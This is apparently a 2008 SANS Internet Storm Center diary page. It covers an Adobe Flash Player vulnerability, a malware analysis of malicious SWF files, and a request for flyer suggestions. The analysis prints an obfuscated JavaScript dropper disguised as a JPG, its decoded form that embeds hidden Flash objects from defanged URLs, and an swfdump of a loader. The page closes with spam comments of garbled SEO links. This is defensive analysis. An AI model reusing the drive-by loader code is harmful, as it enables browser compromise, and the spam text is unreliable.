Adobe flash player vuln

Published: 2008-05-27
Last Updated: 2008-05-28 23:15:20 UTC
by Adrien de Beaupre (Version: 3)
0 comment(s)

A vulnerability has been reported in Adobe Flash Player versions and older, which is the current version available for download now. Adobe has not yet released a patch nor an official advisory. Stay tuned for further developments. Thanks to Steven and Adrien for letting us know

Update1: Symantec has observed that this issue is being actively exploited in the wild and have elevated their ThreatCon.

Update2: A SecurityFocus article is now live here.

Final update:

Updated: May 28 2008 07:53PM - "...Further research indicates that this vulnerability is the same issue described in BID 28695** (Adobe Flash Player Multimedia File Remote Buffer Overflow Vulnerability), so this BID is being retired

Adrien de Beaupré
Bell Canada, Professional Services

0 comment(s)

Malicious swf files?

Published: 2008-05-27
Last Updated: 2008-05-28 00:38:42 UTC
by Adrien de Beaupre (Version: 3)
0 comment(s)

Marco and Eric wrote in to let us know of a potentially malicious site found at


The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|

Using spidermonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase=",0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://"/>');
("<EMBED src=hxxp:// width=0 height=0>")}}

Lets get the swf files and see what they do, wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

Swftools can show us what the swf files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2
Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Running the swf files in a web browser gives me the following URLs:
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.

Thanks to Bojan and Jeremy for their help!

Unknown at this time if these SWF files are related to this vulnerability.

Update1: Fiddling with the URL and looking for potentially vulnerable versions of the player rendered this:


Which gives us a couple of things. One is that this would seem to be an exploit against Adobe Flash Player. Second is that the apparent vulnerable version would be Third is that there is likely additional malware to see continuing down the rabbit hole. Interestingly this SWF file may be exploiting CVE-2007-0071 and not the potentially new previously unknown vulnerability announced by Symantec today, assuming they are different. 

At this time Adobe still has not released any significant information at their blog some clarification would be nice.

Indeed, hxxp:// is downloaded, then hxxp://

Virustotal was 7/31 for ax.exe, and 7/31 for setip.exe earlier this evening.

Other examples of sites serving malicious swf files are now rolling in, which is the perfect timing for me to hand off the awesome power of the Handler On Duty (HOD) reigns to Jim. Hit the Big Red Button (BGR)!! Must go InfoCon orange...

Adrien de Beaupre
Bell Canada, Professional Services

Keywords: malware swf
0 comment(s)

Suggestions wanted for ISC

Published: 2008-05-27
Last Updated: 2008-05-27 13:32:25 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)
For the last few years, we hand out an "ISC Flyer" / "Cheat sheet" at SANS conferences. It currently includes things like a port list, various NOC/abuse desk contact info and such. However, the flyer is very out of date. So my question to you all:

What would you like to see on a flyer like that? What would you find useful enough to hang on your cubicle wall?

We got a legal size sheet of paper that will be folded three-ways and can be printed on both sides. Font size can be on the small side. The result will be downloadable as PDF.

Please use our contact page to submit your ideas.

Keywords: ISC
0 comment(s)


What's this all about ..?
password reveal .
<a hreaf="">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
<a hreaf=""> public bathroom near me</a>
<a hreaf=""> nearest public toilet to me</a>
<a hreaf=""> public bathroom near me</a>
<a hreaf=""> public bathroom near me</a>
<a hreaf=""> nearest public toilet to me</a>
<a hreaf=""> public bathroom near me</a>
Enter comment here... a fake TeamViewer page, and that page led to a different type of malware. This week's infection involved a downloaded JavaScript (.js) file that led to Microsoft Installer packages (.msi files) containing other script that used free or open source programs.
distribute malware. Even if the URL listed on the ad shows a legitimate website, subsequent ad traffic can easily lead to a fake page. Different types of malware are distributed in this manner. I've seen IcedID (Bokbot), Gozi/ISFB, and various information stealers distributed through fake software websites that were provided through Google ad traffic. I submitted malicious files from this example to VirusTotal and found a low rate of detection, with some files not showing as malware at all. Additionally, domains associated with this infection frequently change. That might make it hard to detect.
Enter corthrthmment here...

Diary Archives